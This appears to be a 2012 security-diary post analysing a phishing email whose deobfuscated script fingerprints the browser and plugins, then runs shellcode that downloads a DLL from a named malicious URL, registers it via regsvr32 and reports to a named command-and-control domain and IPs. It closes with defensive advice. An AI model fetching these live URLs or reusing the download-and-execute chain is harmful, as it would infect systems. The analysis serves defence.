Last Updated: 2012-03-03 05:02:38 UTC
by Manuel Humberto Santander Pelaez (Version: 1)
Be careful with the links showed in this diary because they are live and could infect your computer if not handled properly
I received today the following message:
Now here is where the malicious stuff begins. After deobfuscating the script, we find the following:
- The script tries to determine which navigator is running the system:
- The script tries to determine the Adobe Flash and Adobe Reader version installed:
- A shellcode is executed:
Let's take a look to the shellcode. It executes the following instructions:
- kernel32.VirtualProtect: This function is called in the shellcode to establish a 255-byte memory segment where the memory protection attributes can be modified. For more information about the available attributes, see http://msdn.microsoft.com/en-us/library/windows/desktop/aa366786%28v=vs.85%29.aspx.
- kernel32. LoadLibraryA: This function is called to load the urlmon.dll library, which is used to transfer information using the http protocol. A couple of functions inside the file are:
- urlmon.URLDownloadToFileA: The function is called to download http://migdaliasbistro.net/w.php?f=f7d19&e=1 and save it to wpbt0.dll.
- kernel32.WinExec: This function is called to register the dll using regsvr32 -s and then executed.
- kernel32.TerminateThread: This function is called to end the execution of the shellcode.
The file download in step 3 is a dll with MD5 c3124a2981d8e1b9e13e8c21c96448f7. Virustotal shows a 7/43 detection ratio. It injects into explorer.exe and performs inline hooking to ntdll.dll. Once it is installed, it reports to hbirjhcnsuiwgtrq.ru, which resolvs to the following ip addresses: 126.96.36.199, 188.8.131.52, 184.108.40.206, 220.127.116.11, 18.104.22.168, 22.214.171.124, 126.96.36.199 using a http POST to the /rwx/B2_9w3/in/ location.
Such threats are increasing and control of these involves the establishment of malware control measures as part of te Information Security Architecture of the company, like the following:
- Host IPS: The antimalware control is not enough in these days as the threats are evolving and the antivirus companies are not capable anymore to control in real time all the emerging malware attacks. This tool is used to prevent the materialization of the vulnerabilities on computers, such as buffer overflow, code injection, among others. Thus, the computer is protected until the virus signature is out so the antimalware program is able to deal with the respective threat.
- Antimalware: This is the conventional antimalware control that is sold by the antivirus companies.